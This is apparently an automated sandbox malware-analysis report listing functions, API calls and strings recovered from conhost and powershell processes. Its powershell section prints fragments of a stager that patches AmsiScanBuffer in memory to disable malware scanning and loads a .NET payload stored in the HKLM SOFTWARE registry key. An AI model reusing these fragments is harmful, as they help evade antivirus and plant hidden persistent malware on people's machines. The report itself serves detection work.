\\.\pipe\, xrefs: 000002BCD7E328D7

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 94418ce2fcf23f2d7366e151e89398a22eab573ec6af2d096b38897999a98d24
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: DC71B33A200B834AE7349E2AD8583AA7798F385796F65403FDE9987F99DF35C500C741

Function 000002BCD7E080A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BCD7E080CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BCD7E08162

Strings

csm, xrefs: 000002BCD7E08149

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 592a2f882507b8bb5f31254a3c2955ec8dd4b1f454317bbd4f06af0b569f48a4
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 8151C33A312A22CEEB54CF65E44CB6D3791F754B98F25853ADE8A47B88DB78C841C701

Function 000002BCD7E09AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000002BCD7E09BA7

Strings

RCC, xrefs: 000002BCD7E09B77
MOC, xrefs: 000002BCD7E09B6F

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 01fd0f3e5a3c714c2ba62ad6c0392f1de5846a5a7e910a21d7e4d3351a50f75a
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: DF61C076508BC58AEB708F15E44839AB7A0F795B98F14423AEB9807F99CB7CC190CB01

Function 000002BCD7E325DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002BCD7E326C2
StrCpyW.SHLWAPI ref: 000002BCD7E326D9

Strings

\\.\pipe\, xrefs: 000002BCD7E326CD

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 631c9d5d29bdac8509c9ca77f86a8a3ef35000b341ce568978f80f53347d25e4
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: D751043E20479389EA248E29E45C3AA7799F785B82F74003FCE9943F99DB39C404C742

Function 000002BCD7E42660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000002BCD7E42778
GetLastError.KERNEL32 ref: 000002BCD7E4279D

Strings

U, xrefs: 000002BCD7E42722

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: bce6f853d40ad632659a3ba5209567686dd6bd72b8288ce9274302359267c25a
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 9941E636625A858AE710CF65E44C79AB7A4F388798FA0413AEE4D87B58EB38C451CB41

Function 000002BCD7E39178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000002BCD7E391C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000002BCD7E387F7), ref: 000002BCD7E39209

Strings

csm, xrefs: 000002BCD7E391F6

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: c97a3774cc7d355b0db14948a0bc98f5062b051c7691289a82a2681ec75315da
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: D2112B36614B8186EB218B25F448259B7E5F788B98F69423AEE8D07F68DF3CC551CB00

Function 000002BCD7E31D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BCD7E31D69
HeapAlloc.KERNEL32 ref: 000002BCD7E31D77
GetProcessHeap.KERNEL32 ref: 000002BCD7E31D9C
HeapFree.KERNEL32 ref: 000002BCD7E31DAA

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: a0a8107df1f78fac9e92611b823da64947a442bdf788cf292b9005918cec1d14
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 77118439A01F8189EA14CB66A40925977B0F789FD5F68813DDE4E93B65DF38D452C340

Function 000002BCD7E31264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BCD7E3126A
HeapAlloc.KERNEL32 ref: 000002BCD7E31279
GetProcessHeap.KERNEL32 ref: 000002BCD7E31293
HeapAlloc.KERNEL32 ref: 000002BCD7E312A4

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 618dde896c07c5ba486079774e8e52b1625a0b774cd95c99af762bb85c54dc37
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 7DE03235A01A059AE7288B62D80934937E1EB88B49F58803CC90907760EF7DC4A9CB91

Function 000002BCD7E31000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BCD7E31006
HeapAlloc.KERNEL32 ref: 000002BCD7E31015
GetProcessHeap.KERNEL32 ref: 000002BCD7E31028
HeapAlloc.KERNEL32 ref: 000002BCD7E31037

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4e31dccd67dfb38ba59fe6b5f9a56ea0f5fe1b1af33822cb87c64c51fdeac8d9
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 63E06D75A119049AE7188B22D80924833B1FB88B49F548039C90907710EF3884A8D651

Analysis Process: powershell.exePID: 2852, Parent PID: 4828COMMON

Executed Functions

Function 0342D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2434584908.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_342d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5266aa5bc9641d0ed6c5610520ac736294ef4d3cc368b7bb52c4e4ff642c8c5
Instruction ID: 809e59e361374ed38d709203145a49ac932d6f204f552b1fa7835272554ed4e7
Opcode Fuzzy Hash: d5266aa5bc9641d0ed6c5610520ac736294ef4d3cc368b7bb52c4e4ff642c8c5
Instruction Fuzzy Hash: 4A012D7240E3D09ED7128B258894B52BFB4DF57224F1D81DBD9889F2A3C2695845C772

Function 0342D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2434584908.000000000342D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0342D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_342d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54369614fb1c62982558ecd4b76e882c93440c7595f7ccdf37c2067863e8cb0e
Instruction ID: 960fd17d4a2ddf9861dfefbf262733fcee9d3653d5e4073e37d2afb2b16faacb
Opcode Fuzzy Hash: 54369614fb1c62982558ecd4b76e882c93440c7595f7ccdf37c2067863e8cb0e
Instruction Fuzzy Hash: FD01F7718043509AE720CA15CC84B67FFD8DF56329F4CC45BED686F292C6799842C6B5

Analysis Process: powershell.exePID: 3804, Parent PID: 2852COMMON

Execution Graph

Execution Coverage:	74.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.7%
Total number of Nodes:	101
Total number of Limit Nodes:	9

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 004011AD Relevance: 42.4, APIs: 20, Strings: 4, Instructions: 356
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
SysAllocString.OLEAUT32(00402234), ref: 004011CC
SysAllocString.OLEAUT32(powershell), ref: 004011D8
SysAllocString.OLEAUT32(?), ref: 004011E0
SysAllocString.OLEAUT32(0040218C), ref: 004011EA
SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
VariantInit.OLEAUT32(?), ref: 00401250
VariantInit.OLEAUT32(?), ref: 004013EA
VariantInit.OLEAUT32(?), ref: 004013F0
VariantInit.OLEAUT32(?), ref: 00401400
CoUninitialize.COMBASE ref: 004014E8
SysFreeString.OLEAUT32(?), ref: 004014FA
SysFreeString.OLEAUT32(00000000), ref: 004014FD
SysFreeString.OLEAUT32(?), ref: 00401502
SysFreeString.OLEAUT32(?), ref: 00401507
SysFreeString.OLEAUT32(?), ref: 0040150C
SysFreeString.OLEAUT32(?), ref: 00401511

Strings

$rbx-svc64, xrefs: 004011C0, 004011C1
SYSTEM, xrefs: 004011EC
$rbx-svc32, xrefs: 004011B6
powershell, xrefs: 004011D0

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
API String ID: 3960698109-3701805373
Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

Function 004017A5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE

Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250

Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594

Strings

SOFTWARE, xrefs: 004017F7
$rbx-svc64, xrefs: 00401835
$rbx-svc32, xrefs: 00401827
$rbx-stager, xrefs: 00401810
EXE, xrefs: 004017AB

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
API String ID: 2402434814-2001424239
Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 1815803762-291530887
Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Strings

LoadLibraryPtr, xrefs: 00401944
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
LoadLibraryDelegate, xrefs: 00401920
ParameterTypes, xrefs: 004018E4
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
AmsiPtr, xrefs: 0040195C
TypeBuilder, xrefs: 004018FC
AmsiScanBufferPtr, xrefs: 00401968
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
NativeMethods, xrefs: 00401908
VirtualProtectPtr, xrefs: 00401950
ReturnType, xrefs: 004018F0
GetProcAddress, xrefs: 00401914
VirtualProtectDelegate, xrefs: 0040192C
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
Get-Delegate, xrefs: 004018D8
Kernel32Ptr, xrefs: 00401938
OldProtect, xrefs: 00401974

Memory Dump Source

Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_400000_powershell.jbxd

Similarity

API ID: Process$Heap$AllocCurrentWow64
String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
API String ID: 2666690646-646820343
Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

